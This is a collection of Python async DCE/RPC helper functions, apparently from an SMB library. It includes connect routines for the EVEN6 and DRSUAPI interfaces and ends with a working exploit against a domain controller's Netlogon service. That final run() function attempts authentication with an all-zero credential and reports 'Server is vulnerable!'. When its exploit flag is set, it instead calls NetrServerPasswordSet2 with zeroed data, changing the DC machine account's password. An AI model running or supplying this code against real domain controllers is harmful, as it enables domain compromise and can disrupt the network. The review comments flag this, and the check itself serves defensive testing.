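async def connect(self, open=True):
    """Open a DCE/RPC connection to the EVEN6 (event log) interface.

    Resolves the interface endpoint through the endpoint mapper over
    ``ncacn_ip_tcp``, connects with packet privacy, binds
    ``even6.MSRPC_UUID_EVEN6`` and stores the bound connection on
    ``self.dce``.

    Args:
        open: accepted for interface compatibility; this method does not
            read it.

    Returns:
        ``(True, None)`` on success, ``(False, exc)`` on any failure;
        nothing is raised to the caller.
    """
    # Bound before the try so the finally cannot hit an unbound local
    # when the EPM constructor itself raises.
    epm = None
    try:
        epm = EPM(self.connection, protocol='ncacn_ip_tcp')
        _, err = await epm.connect()
        if err is not None:
            return False, err
        # rr() presumably raises on a failed lookup; the except below
        # turns that into the (False, exc) return.
        string_binding, _ = await rr(epm.map(even6.MSRPC_UUID_EVEN6))
        self.dce = epm.get_connection_from_stringbinding(string_binding)
        # Packet privacy: interface traffic is encrypted and integrity
        # protected, matching the other connect() helpers in this file.
        self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        _, err = await self.dce.connect()
        if err is not None:
            return False, err
        _, err = await self.dce.bind(even6.MSRPC_UUID_EVEN6)
        if err is not None:
            # NOTE(review): self.dce stays connected on a failed bind;
            # callers may want to disconnect it before retrying.
            return False, err
        return True, None
    except Exception as e:
        return False, e
    finally:
        # The mapper connection is only needed for the endpoint lookup.
        if epm is not None:
            await epm.disconnect()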
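async def connect(self, open=False):
    """Open a DCE/RPC connection to the DRSUAPI interface.

    Resolves the DRSUAPI endpoint through the endpoint mapper over
    ``ncacn_ip_tcp``, connects with packet privacy and stores the
    connection on ``self.dce``. When ``open`` is truthy, ``self.open()``
    is called afterwards.

    Args:
        open: whether to call ``self.open()`` once connected.

    Returns:
        ``(True, None)`` on success, ``(False, exc)`` on any failure;
        nothing is raised to the caller.
    """
    # Bound before the try so the finally cannot hit an unbound local
    # when the EPM constructor itself raises.
    epm = None
    try:
        epm = EPM(self.connection, protocol='ncacn_ip_tcp')
        _, err = await epm.connect()
        if err is not None:
            raise err
        # rr() presumably raises on a failed lookup; the except below
        # turns that into the (False, exc) return.
        string_binding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
        self.dce = epm.get_connection_from_stringbinding(string_binding)
        # The original note insists this must be set: DRSUAPI traffic is
        # carried with packet privacy (encrypted + integrity protected).
        self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        _, err = await self.dce.connect()
        if err is not None:
            raise err
        # NOTE(review): no bind() is issued here, unlike the EVEN6
        # connect(); presumably self.open() performs it — confirm.
        if open:
            _, err = await self.open()
            if err is not None:
                raise err
        return True, None
    except Exception as e:
        return False, e
    finally:
        # The mapper connection is only needed for the endpoint lookup.
        if epm is not None:
            await epm.disconnect()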
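async def filereader_test(connection_string, filename, proxy=None):
    """Smoke-test the endpoint mapper: resolve the DRSUAPI endpoint and print it.

    Args:
        connection_string: connection URL understood by ``SMBConnectionURL``.
        filename: accepted for interface compatibility; not read here.
        proxy: accepted for interface compatibility; not read here.

    Raises:
        Whatever ``rr`` raises when the mapper connection fails, and the
        error object returned by ``epm.map`` when the lookup fails.
    """
    cu = SMBConnectionURL(connection_string)
    smb_connection = cu.get_connection()
    epm = EPM(smb_connection, protocol='ncacn_ip_tcp')
    await rr(epm.connect())
    try:
        data, exc = await epm.map(drsuapi.MSRPC_UUID_DRSUAPI)
        if exc is not None:
            raise exc
        print(data)
    finally:
        # Release the mapper connection on both the success and the error path.
        await epm.disconnect()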
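async def connect(self, open=False):
    """Open a DCE/RPC connection to the DRSUAPI interface (raising variant).

    Like the ``(ok, err)``-returning connect() helpers in this file, but
    every step goes through ``rr`` so failures propagate as exceptions.
    The connection is stored on ``self.dce``; when ``open`` is truthy,
    ``self.open()`` is called afterwards.

    Args:
        open: whether to call ``self.open()`` once connected.

    Returns:
        ``(True, None)`` on success.

    Raises:
        Whatever ``rr`` raises for a failed mapper, connect or open step.
    """
    epm = EPM(self.connection, protocol='ncacn_ip_tcp')
    await rr(epm.connect())
    try:
        string_binding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
        self.dce = epm.get_connection_from_stringbinding(string_binding)
        # The original note insists this must be set: DRSUAPI traffic is
        # carried with packet privacy (encrypted + integrity protected).
        self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        await rr(self.dce.connect())
        if open:
            await rr(self.open())
        return True, None
    finally:
        # The mapper connection is only needed for the endpoint lookup;
        # release it whether or not the remaining steps succeeded.
        await epm.disconnect()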
async def run(dc_name: str, dc_ip, exploit: bool = False) -> None:
    """Check whether a DC's Netlogon service accepts an all-zero client credential.

    Resolves the NRPC endpoint through the endpoint mapper, binds it without
    an RPC auth level (the ``set_auth_level`` call is commented out below)
    and, up to ``MAX_ATTEMPTS`` times, issues ``NetrServerReqChallenge``
    followed by ``NetrServerAuthenticate3`` with an all-zero client
    credential. A response ``ErrorCode`` of 0 is printed as
    "Server is vulnerable!".

    Args:
        dc_name: DC hostname; used for the server handle and as the target
            computer account name (the '$' suffix is appended in the calls).
        dc_ip: not read by this function (only a commented-out assignment
            mentions it).
        exploit: when True, ``NetrServerAuthenticate3`` is replaced by
            ``NetrServerPasswordSet2`` with a zero authenticator and a
            516-byte zero buffer. NOTE(review): per the RPC name this is a
            state-changing call against the machine account, not a
            read-only check — confirm before enabling.

    Raises:
        The error object returned by any EPM/DCE step, and any RPC error
        whose code is not 0xc0000022 (that code is treated as "retry").
    """
    #exploit = True
    #dc_name = 'WIN2019AD'
    # Server handle in UNC form: '\\' + hostname
    dc_handle = '\\\\' + dc_name
    #dc_ip = '10.10.10.2'
    target_computer = dc_name #without $
    # Client challenge and client credential sent to the server, both all zeros
    plaintext = b'\x00' * 8
    ciphertext = b'\x00' * 8
    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
    flags = 0x212fffff
    url = SMBConnectionURL('smb2+ntlm-password://XXX\\aaa:aaa@%s' % dc_name) # dummy url to speed up the process..
    connection = url.get_connection()
    async with connection:
        epm = EPM(connection, protocol='ncacn_ip_tcp')
        _, err = await epm.connect()
        if err is not None:
            raise err
        stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
        # NOTE(review): the err from epm.map() is never checked; the second
        # epm.connect() below overwrites it, so a failed lookup would only
        # surface later through an unusable string binding.
        _, err = await epm.connect()
        if err is not None:
            raise err
        dce = epm.get_connection_from_stringbinding(stringBinding)
        # Unlike the other connect() helpers in this file, no auth level is
        # set on this connection.
        #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        _, err = await dce.connect()
        if err is not None:
            raise err
        _, err = await dce.bind(nrpc.MSRPC_UUID_NRPC)
        if err is not None:
            raise err
        # MAX_ATTEMPTS is a module-level constant defined outside this block
        for _ in range(0, MAX_ATTEMPTS):
            print('=====================================================')
            _, err = await nrpc.hNetrServerReqChallenge(
                dce, dc_handle + '\x00', target_computer + '\x00', plaintext)
            if err is not None:
                raise err
            if exploit is False:
                # Read-only check: authenticate with the all-zero credential
                server_auth, err = await nrpc.hNetrServerAuthenticate3(
                    dce, dc_handle + '\x00', target_computer + '$\x00',
                    nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                    target_computer + '\x00', ciphertext, flags)
            else:
                # State-changing branch, see the docstring
                authenticator = nrpc.NETLOGON_AUTHENTICATOR()
                authenticator['Credential'] = b'\x00' * 8
                authenticator['Timestamp'] = 0
                server_auth, err = await nrpc.hNetrServerPasswordSet2(
                    dce, dc_handle + '\x00', target_computer + '$\x00',
                    nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                    target_computer + '\x00', authenticator, b'\x00' * 516)
            if err is not None:
                # 0xc0000022 (STATUS_ACCESS_DENIED): this attempt was rejected,
                # move on to the next one; any other RPC error is fatal.
                if err.get_error_code() == 0xc0000022:
                    continue
                else:
                    raise err
            if server_auth['ErrorCode'] == 0:
                print('Server is vulnerable!')
                break
            else:
                print('FAILED!')
        # NOTE(review): not in a finally, so an error raised above leaves
        # dce connected until the enclosing async-with tears the transport down.
        await dce.disconnect()